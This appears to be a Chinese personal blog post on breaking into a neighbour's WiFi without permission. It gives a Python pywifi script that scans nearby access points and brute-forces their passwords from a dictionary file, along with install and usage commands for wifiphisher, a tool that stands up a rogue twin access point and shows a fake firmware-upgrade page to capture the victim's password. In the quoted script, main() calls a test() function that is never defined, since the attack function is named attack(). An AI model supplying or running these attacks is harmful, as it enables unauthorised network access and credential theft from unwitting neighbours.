蹭隔壁的WiFI

前言

最近在家,由于某些原因家里还没网。老是去别人家蹭,都不好意思了。也试着跑隔壁的弱口令,但是没解决,想跑Pin吧,但是没环境。几经挫折,最后终于拿下了,可是信号好差……

概述

其实,我们蹭到隔壁无线的方法,最笨的有咱们可以跑跑字典阿,试试弱口令阿,实在不行,咱们可以利用Kali下的工具跑跑Pin码,甚至做一些更猥琐的事情。比如下面的内容。

0x01 跑字典

一开始我试了几个弱口令,但是虽然是小村子,但是隔壁的wifi还是不少,我总不能一个一个试吧,这一点都不优雅,所以想到之前看到的python的一个模块,叫pywifi。得 咱们写一个脚本来跑跑密码吧。

关键代码如下
热点扫描

1
2
3
4
5
6
def scans(face,timeout):
#开始扫描
face.scan()
time.sleep(timeout)
#在若干秒后获取扫描结果
return face.scan_results()

热点攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
def attack(i,face,x,key,stu,ts):
#显示对应网络名称,考虑到部分中文名啧显示bssid
showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
#迭代字典并进行爆破
for n,k in enumerate(key):
x.key = k.strip()
#移除所有热点配置
face.remove_all_network_profiles()
#讲封装好的目标尝试连接
face.connect(face.add_network_profile(x))
#初始化状态码,考虑到用0会发生些逻辑错误
code = 10
t1 = time.time()
#循环刷新状态,如果置为0则密码错误,如超时则进行下一个
while code!=0 :
time.sleep(0.1)
code = face.status()
now = time.time()-t1
if now>ts:
break
stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("\n","")))
stu.flush()
if code == 4:
face.disconnect()
return "%-*s| %s | %*s |%*s\n"%(20,x.ssid,x.bssid,3,x.signal,15,k)
return False

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

def main():
#扫描时常
scantimes = 3
#单个密码测试延迟
testtimes = 15
output = sys.stdout
#结果文件保存路径
files = "TestRes.txt"
#字典列表
keys = open(sys.argv[1],"r").readlines()
print "|KEYS %s"%(len(keys))
#实例化一个pywifi对象
wifi = PyWiFi()
#选择定一个网卡并赋值于iface
iface = wifi.interfaces()[0]
#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
scanres = scans(iface,scantimes)
#统计附近被发现的热点数量
nums = len(scanres)
print "|SCAN GET %s"%(nums)
print "%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)
#将每一个热点信息逐一进行测试
for i,x in enumerate(scanres):
#测试完毕后,成功的结果讲存储到files中
res = test(nums-i,iface,x,keys,output,testtimes)
if res:
open(files,"a").write(res)

作者:面包君
链接:https://zhuanlan.zhihu.com/p/25149544

但是一点软用都没有,没辙,难道我也要去跑Pin码吗?但是峰回路转,我看到这篇文章附赠了一个链接。

0x02 wifiphisher

主要原理

  • 创建一个伪AP来“狸猫换太子”,然后撤销用户AP的授权,
  • 通知用户需要进行“固件升级”,需要重新验证密码。你的假AP由于具有相同的SSID,用户便会“交代”密码。
  • 这样你就能得到用户的密码,并且让用户采用你的伪AP做为自己的接入点。而对方一无所知。

从文章的介绍来看,是有相似的脚本的,比如它所提到的Airsnaf,不过这里文章所说的是Wifiphisher
Github源码 链接
安装

1
2
3
git clone https://github.com/sophron/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies (Currently, hostapd, dnsmasq, PyRIC, blessings)

Usage

1
wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade

1
wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd


更多详细资料 项目地址
文章地址

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
  1. 1. 前言
  2. 2. 概述
  3. 3. 0x01 跑字典
  4. 4. 0x02 wifiphisher
,